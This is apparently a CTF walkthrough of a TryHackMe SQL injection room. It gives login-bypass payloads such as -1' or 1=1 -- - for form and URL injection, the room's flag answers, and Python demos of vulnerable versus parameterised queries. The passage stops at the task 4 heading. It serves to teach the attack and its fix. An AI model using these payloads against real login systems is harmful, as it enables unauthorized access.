Try Hack Me: SQL Injection Lab

Sanilgurung
3 min read · Jun 11, 2024


This is a walkthrough of the Try Hack Me room SQL Injection Lab, which demonstrates several SQL injection attacks against a small login application.

TASK 2

SQL Injection 1: Input Box Non-String

Once we have the IP address of the machine, we scan it with nmap to see which ports are open and what services are running on them.

The scan shows an HTTP service listening (the web app is on port 5000 in this lab), so we open that port in the browser.

The first challenge presents a login form. Here the profileID value is used in the query as a number (non-string), so no quote is needed to break out of it: in the user field we enter 10 or 1=1 -- - and in the password field any string. The or 1=1 makes the WHERE clause true for every row and the -- - comments out the rest of the query, including the password check, so the login is bypassed and we are redirected to a new page.

What is the flag for SQL Injection 1: Input Box Non-String?

= THM{dccea429d73d4a6b4f117ac64724f460}

SQL Injection 2: Input Box String

This challenge uses the same idea, but profileID is now handled as a string, so the application wraps our value in quotes inside the query. The payload therefore has to close that quote first: -1' or 1=1 -- - in the user field, with any password.

This bypasses the login as well and redirects to a new page containing the flag.
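To make the difference between the non-string and string cases concrete, here is an added example (not code from the room or from this walkthrough) that rebuilds both vulnerable queries against an in-memory SQLite table and shows the parameterised fix. The table, column names and credentials are constructed for the demo; the lab's real schema and database engine are not shown on the page, but the -- comment trick behaves the same in MySQL, PostgreSQL and SQLite.

```python
import sqlite3


def make_db():
    """Constructed sample data (assumption: the lab's real schema is not shown)."""
    con = sqlite3.connect(":memory:")
    con.execute("CREATE TABLE users (profileID INTEGER, username TEXT, password TEXT)")
    con.executemany(
        "INSERT INTO users VALUES (?, ?, ?)",
        [(1, "admin", "s3cret"), (2, "bob", "hunter2")],
    )
    return con


def login_nonstring(profile_id, password):
    """Task 1 shape: profileID is interpolated unquoted (numeric column).

    A payload such as  10 or 1=1 -- -  needs no quote to escape the value;
    the comment swallows the  AND password='...'  that follows.
    Returns the usernames the WHERE clause matched.
    """
    con = make_db()
    sql = f"SELECT username FROM users WHERE profileID={profile_id} AND password='{password}'"
    return [row[0] for row in con.execute(sql)]


def login_string(profile_id, password):
    """Task 2 shape: profileID is quoted, so the payload must first close the quote:
    -1' or 1=1 -- -
    """
    con = make_db()
    sql = f"SELECT username FROM users WHERE profileID='{profile_id}' AND password='{password}'"
    return [row[0] for row in con.execute(sql)]


def login_safe(profile_id, password):
    """Hardened version: bound parameters. The payload is compared as data,
    never parsed as SQL, so 'or 1=1' matches nothing."""
    con = make_db()
    sql = "SELECT username FROM users WHERE profileID=? AND password=?"
    return [row[0] for row in con.execute(sql, (profile_id, password))]


if __name__ == "__main__":
    print("non-string injection:", login_nonstring("10 or 1=1 -- -", "a"))
    print("string injection:    ", login_string("-1' or 1=1 -- -", "a"))
    print("parameterised query: ", login_safe("10 or 1=1 -- -", "a"))
    print("legitimate login:    ", login_safe(1, "s3cret"))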

What is the flag for SQL Injection 2: Input Box String?

= THM{356e9de6016b9ac34e02df99a5f755ba}

SQL Injection 3: URL Injection

This form submits the login with a GET request, so the credentials travel in the URL query string. Instead of typing the payload into the form as in the previous tasks, we put it straight into the URL:

http://10.10.245.66:5000/sesqli3/login?profileID=-1' or 1=1-- -&password=a

Because the payload never goes through the form's JavaScript, the client-side validation is bypassed along with the login.

The browser percent-encodes (URL-encodes) the request for us. URL encoding is needed because a URL can carry only a limited set of characters literally; everything else is written as %XX byte values. Encoded, the URL looks as follows:

http://10.10.245.66:5000/sesqli3/login?profileID=-1%27%20or%201=1--%20-&password=a

%27 is the single quote (') and %20 is a space. The server decodes them before building the query, so the injection reaches the database exactly as we typed it.
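As an added example (not from the original post), the following Python reproduces what the browser does to the task 3 payload and what the server sees after decoding, using the target URL from the walkthrough. It also shows a caveat worth knowing: a payload ending in the MySQL-style # comment has to be encoded by hand, because an unencoded # in the address bar starts the URL fragment, and a fragment is never sent to the server, so the rest of the query string (and the comment) silently disappears.

```python
from urllib.parse import quote, urlsplit, parse_qs

# Target URL taken from the walkthrough.
BASE = "http://10.10.245.66:5000/sesqli3/login"


def encode_param(value):
    """Percent-encode one query-string value the way a browser does for a URL
    typed into the address bar: letters, digits and -._~ stay as they are,
    a quote becomes %27 and a space %20. '=' is left alone to match the
    encoded URL shown in the walkthrough."""
    return quote(value, safe="=")


def injection_url(profile_id, password):
    """Build the GET request URL with both parameters encoded."""
    return f"{BASE}?profileID={encode_param(profile_id)}&password={encode_param(password)}"


def server_side_view(url):
    """What the web app receives: the query string split and percent-decoded,
    plus whatever the browser would have kept back as the fragment."""
    parts = urlsplit(url)
    params = parse_qs(parts.query, keep_blank_values=True)
    return {k: v[0] for k, v in params.items()}, parts.fragment


if __name__ == "__main__":
    url = injection_url("-1' or 1=1-- -", "a")
    print(url)
    print(server_side_view(url))

    # Caveat: an unencoded '#' turns the rest of the URL into a fragment,
    # so the server never sees the comment or the password parameter.
    raw = BASE + "?profileID=-1' or 1=1#&password=a"
    print(server_side_view(raw))
    # Encoding the payload (# -> %23) delivers it intact.
    print(server_side_view(injection_url("-1' or 1=1#", "a")))
```

Note that parse_qs, like the frameworks that use form decoding, also turns a literal + into a space; a payload that needs a real plus sign must encode it as %2B.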

What is the flag for SQL Injection 3: URL Injection?

= THM{645eab5d34f81981f5705de54e8a9c36}

SQL Injection 4: POST Injection
